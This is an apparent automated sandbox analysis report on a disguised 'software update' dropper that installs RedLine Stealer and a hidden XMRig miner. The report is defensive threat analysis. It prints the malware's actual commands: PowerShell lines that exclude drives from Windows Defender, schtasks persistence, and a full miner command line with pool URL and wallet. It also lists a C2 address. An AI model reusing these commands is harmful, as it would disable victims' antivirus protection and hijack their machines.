Analysis
-
max time kernel
151s -
max time network
147s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
26-10-2021 15:33
Static task
static1
Behavioral task
behavioral1
Sample
Software updated by Dylox.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
Software updated by Dylox.exe
Resource
win10-en-20210920
Behavioral task
behavioral3
Sample
Software-update-patc_828811790.exe
Resource
win7-en-20210920
Behavioral task
behavioral4
Sample
Software-update-patc_828811790.exe
Resource
win10-en-20211014
Behavioral task
behavioral5
Sample
open this if the doesn't work.exe
Resource
win7-en-20210920
Behavioral task
behavioral6
Sample
open this if the doesn't work.exe
Resource
win10-en-20211014
General
-
Target
Software updated by Dylox.exe
-
Size
3.2MB
-
MD5
6f78118b606c3c7c9bad1a9e0671cda8
-
SHA1
00abbc6a45d7009d8e166794289b39d0bb709ba5
-
SHA256
7be5baa4d9a45af1e6f15fdf6600537ed78e1694f9daa37741b5e8c3e58d7005
-
SHA512
77d474c0a67754e7f71ee1c932cd4f21bcbd1f94472ffd9c21cbe2c6242f5fa07f5fede82255b9037cff87fbde614225105db3b6a55be560dfc10ac74149d916
Malware Config
Extracted
redline
Youtube
185.203.240.16:1249
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/832-81-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/832-82-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/832-83-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/832-84-0x0000000000418D32-mapping.dmp family_redline behavioral1/memory/832-86-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
XMRig Miner Payload 12 IoCs
Processes:
resource yara_rule behavioral1/memory/1756-218-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1756-220-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1756-221-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1756-223-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1756-227-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1756-231-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1756-233-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1756-235-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1756-234-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1756-237-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1756-238-0x000000014030F3F8-mapping.dmp xmrig behavioral1/memory/1756-241-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
Processes:
Datafile32.exeDatafile64.exeServer32.exeServer32.exeservices32.exeservices64.exesihost32.exesihost64.exepid process 632 Datafile32.exe 1380 Datafile64.exe 1820 Server32.exe 832 Server32.exe 1380 services32.exe 1984 services64.exe 1612 sihost32.exe 1144 sihost64.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Software updated by Dylox.exeDatafile64.exeservices64.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Software updated by Dylox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Software updated by Dylox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Datafile64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Datafile64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion services64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion services64.exe -
Loads dropped DLL 12 IoCs
Processes:
Software updated by Dylox.exeServer32.execmd.execmd.execonhost.execonhost.exepid process 656 Software updated by Dylox.exe 656 Software updated by Dylox.exe 656 Software updated by Dylox.exe 656 Software updated by Dylox.exe 656 Software updated by Dylox.exe 1820 Server32.exe 1056 cmd.exe 1056 cmd.exe 1656 cmd.exe 1528 conhost.exe 1528 conhost.exe 1488 conhost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/656-58-0x0000000000B00000-0x0000000000B01000-memory.dmp themida \Users\Admin\AppData\Local\Temp\Datafile64.exe themida C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida behavioral1/memory/1380-73-0x0000000000400000-0x0000000000EAE000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida \Windows\System32\services64.exe themida C:\Windows\System32\services64.exe themida behavioral1/memory/1984-158-0x0000000000400000-0x0000000000EAE000-memory.dmp themida C:\Windows\system32\services64.exe themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
services64.exeSoftware updated by Dylox.exeDatafile64.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA services64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Software updated by Dylox.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Datafile64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 12 IoCs
Processes:
powershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
Software updated by Dylox.exeDatafile64.exeservices64.exepid process 656 Software updated by Dylox.exe 1380 Datafile64.exe 1984 services64.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
Server32.execonhost.exedescription pid process target process PID 1820 set thread context of 832 1820 Server32.exe Server32.exe PID 1488 set thread context of 1756 1488 conhost.exe nslookup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 33 IoCs
Processes:
Server32.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exenslookup.exepid process 832 Server32.exe 1744 conhost.exe 268 powershell.exe 1284 powershell.exe 1852 conhost.exe 1908 powershell.exe 996 powershell.exe 1528 conhost.exe 1528 conhost.exe 1632 powershell.exe 1648 powershell.exe 1488 conhost.exe 1488 conhost.exe 1624 powershell.exe 1600 powershell.exe 1756 nslookup.exe 1756 nslookup.exe 1756 nslookup.exe 1756 nslookup.exe 1756 nslookup.exe 1756 nslookup.exe 1756 nslookup.exe 1756 nslookup.exe 1756 nslookup.exe 1756 nslookup.exe 1756 nslookup.exe 1756 nslookup.exe 1756 nslookup.exe 1756 nslookup.exe 1756 nslookup.exe 1756 nslookup.exe 1756 nslookup.exe 1756 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
Software updated by Dylox.exeServer32.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exenslookup.exedescription pid process Token: SeDebugPrivilege 656 Software updated by Dylox.exe Token: SeDebugPrivilege 832 Server32.exe Token: SeDebugPrivilege 1744 conhost.exe Token: SeDebugPrivilege 268 powershell.exe Token: SeDebugPrivilege 1284 powershell.exe Token: SeDebugPrivilege 1852 conhost.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeDebugPrivilege 996 powershell.exe Token: SeDebugPrivilege 1528 conhost.exe Token: SeDebugPrivilege 1632 powershell.exe Token: SeDebugPrivilege 1648 powershell.exe Token: SeDebugPrivilege 1488 conhost.exe Token: SeDebugPrivilege 1624 powershell.exe Token: SeDebugPrivilege 1600 powershell.exe Token: SeLockMemoryPrivilege 1756 nslookup.exe Token: SeLockMemoryPrivilege 1756 nslookup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Software updated by Dylox.exeServer32.exeDatafile32.execonhost.execmd.execmd.exeDatafile64.execonhost.execmd.execmd.execmd.exedescription pid process target process PID 656 wrote to memory of 632 656 Software updated by Dylox.exe Datafile32.exe PID 656 wrote to memory of 632 656 Software updated by Dylox.exe Datafile32.exe PID 656 wrote to memory of 632 656 Software updated by Dylox.exe Datafile32.exe PID 656 wrote to memory of 632 656 Software updated by Dylox.exe Datafile32.exe PID 656 wrote to memory of 1380 656 Software updated by Dylox.exe Datafile64.exe PID 656 wrote to memory of 1380 656 Software updated by Dylox.exe Datafile64.exe PID 656 wrote to memory of 1380 656 Software updated by Dylox.exe Datafile64.exe PID 656 wrote to memory of 1380 656 Software updated by Dylox.exe Datafile64.exe PID 656 wrote to memory of 1820 656 Software updated by Dylox.exe Server32.exe PID 656 wrote to memory of 1820 656 Software updated by Dylox.exe Server32.exe PID 656 wrote to memory of 1820 656 Software updated by Dylox.exe Server32.exe PID 656 wrote to memory of 1820 656 Software updated by Dylox.exe Server32.exe PID 1820 wrote to memory of 832 1820 Server32.exe Server32.exe PID 1820 wrote to memory of 832 1820 Server32.exe Server32.exe PID 1820 wrote to memory of 832 1820 Server32.exe Server32.exe PID 1820 wrote to memory of 832 1820 Server32.exe Server32.exe PID 1820 wrote to memory of 832 1820 Server32.exe Server32.exe PID 1820 wrote to memory of 832 1820 Server32.exe Server32.exe PID 1820 wrote to memory of 832 1820 Server32.exe Server32.exe PID 1820 wrote to memory of 832 1820 Server32.exe Server32.exe PID 1820 wrote to memory of 832 1820 Server32.exe Server32.exe PID 632 wrote to memory of 1744 632 Datafile32.exe conhost.exe PID 632 wrote to memory of 1744 632 Datafile32.exe conhost.exe PID 632 wrote to memory of 1744 632 Datafile32.exe conhost.exe PID 632 wrote to memory of 1744 632 Datafile32.exe conhost.exe PID 1744 wrote to memory of 1756 1744 conhost.exe cmd.exe PID 1744 wrote to memory of 1756 1744 conhost.exe cmd.exe PID 1744 wrote to memory of 1756 1744 conhost.exe cmd.exe PID 1756 wrote to memory of 268 1756 cmd.exe powershell.exe PID 1756 wrote to memory of 268 1756 cmd.exe powershell.exe PID 1756 wrote to memory of 268 1756 cmd.exe powershell.exe PID 1744 wrote to memory of 592 1744 conhost.exe cmd.exe PID 1744 wrote to memory of 592 1744 conhost.exe cmd.exe PID 1744 wrote to memory of 592 1744 conhost.exe cmd.exe PID 592 wrote to memory of 1648 592 cmd.exe schtasks.exe PID 592 wrote to memory of 1648 592 cmd.exe schtasks.exe PID 592 wrote to memory of 1648 592 cmd.exe schtasks.exe PID 1756 wrote to memory of 1284 1756 cmd.exe powershell.exe PID 1756 wrote to memory of 1284 1756 cmd.exe powershell.exe PID 1756 wrote to memory of 1284 1756 cmd.exe powershell.exe PID 1380 wrote to memory of 1852 1380 Datafile64.exe conhost.exe PID 1380 wrote to memory of 1852 1380 Datafile64.exe conhost.exe PID 1380 wrote to memory of 1852 1380 Datafile64.exe conhost.exe PID 1380 wrote to memory of 1852 1380 Datafile64.exe conhost.exe PID 1852 wrote to memory of 1668 1852 conhost.exe cmd.exe PID 1852 wrote to memory of 1668 1852 conhost.exe cmd.exe PID 1852 wrote to memory of 1668 1852 conhost.exe cmd.exe PID 1668 wrote to memory of 1908 1668 cmd.exe powershell.exe PID 1668 wrote to memory of 1908 1668 cmd.exe powershell.exe PID 1668 wrote to memory of 1908 1668 cmd.exe powershell.exe PID 1852 wrote to memory of 780 1852 conhost.exe cmd.exe PID 1852 wrote to memory of 780 1852 conhost.exe cmd.exe PID 1852 wrote to memory of 780 1852 conhost.exe cmd.exe PID 780 wrote to memory of 852 780 cmd.exe schtasks.exe PID 780 wrote to memory of 852 780 cmd.exe schtasks.exe PID 780 wrote to memory of 852 780 cmd.exe schtasks.exe PID 1668 wrote to memory of 996 1668 cmd.exe powershell.exe PID 1668 wrote to memory of 996 1668 cmd.exe powershell.exe PID 1668 wrote to memory of 996 1668 cmd.exe powershell.exe PID 1744 wrote to memory of 1056 1744 conhost.exe cmd.exe PID 1744 wrote to memory of 1056 1744 conhost.exe cmd.exe PID 1744 wrote to memory of 1056 1744 conhost.exe cmd.exe PID 1056 wrote to memory of 1380 1056 cmd.exe services32.exe PID 1056 wrote to memory of 1380 1056 cmd.exe services32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software updated by Dylox.exe"C:\Users\Admin\AppData\Local\Temp\Software updated by Dylox.exe"1⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\services32.exe"4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\services32.exeC:\Users\Admin\services32.exe5⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"6⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "/sihost32"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"4⤵
- Loads dropped DLL
-
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"6⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"8⤵
-
C:\Windows\System32\nslookup.exeC:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/HLOYsB6MqZ9V7F19H0MAEc0HL5dHX6oXKZkVMPa+PCA=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Server32.exe"C:\Users\Admin\AppData\Local\Temp\Server32.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeC:\Users\Admin\AppData\Local\Temp\Server32.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
842d5b37c0e9afb213da7f9cf7c3f7c8
SHA17d27e2bd37ec3878a2b00fd99c6f29f9bab9a5b8
SHA2563aa67817143a918fa420c7646002e2a6c932dca93719870ce4c440556504f38a
SHA5127e91085f6b914f711b1871704286fed5dfaba6d2a874da4149b6b637231375fc3df96ede7f66f193d0f696a848ebb8d12a6efc30801fe395282b1583a1574f65
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exeMD5
55f246c4f670bddc2e1c6fab66fb9af8
SHA1b2737bf54e19008f7230830c987e9cc45ca9dba7
SHA2564c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
SHA512c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exeMD5
55f246c4f670bddc2e1c6fab66fb9af8
SHA1b2737bf54e19008f7230830c987e9cc45ca9dba7
SHA2564c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
SHA512c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeMD5
7190f3a53c0e5247c2b7ece197acddea
SHA1495b35f241df11b61ddc781ac64e2a3f24d6915b
SHA256646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3
SHA512cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeMD5
7190f3a53c0e5247c2b7ece197acddea
SHA1495b35f241df11b61ddc781ac64e2a3f24d6915b
SHA256646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3
SHA512cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeMD5
7190f3a53c0e5247c2b7ece197acddea
SHA1495b35f241df11b61ddc781ac64e2a3f24d6915b
SHA256646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3
SHA512cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exeMD5
a48e4ecd100871e98f3b6128f9b37187
SHA18adf645a05d8ede551aadaaf51a37a47071497b9
SHA256b141d0c63cfd6c373f4721eba43014c7ce9e1d3b10aabcefe17750abb9b55283
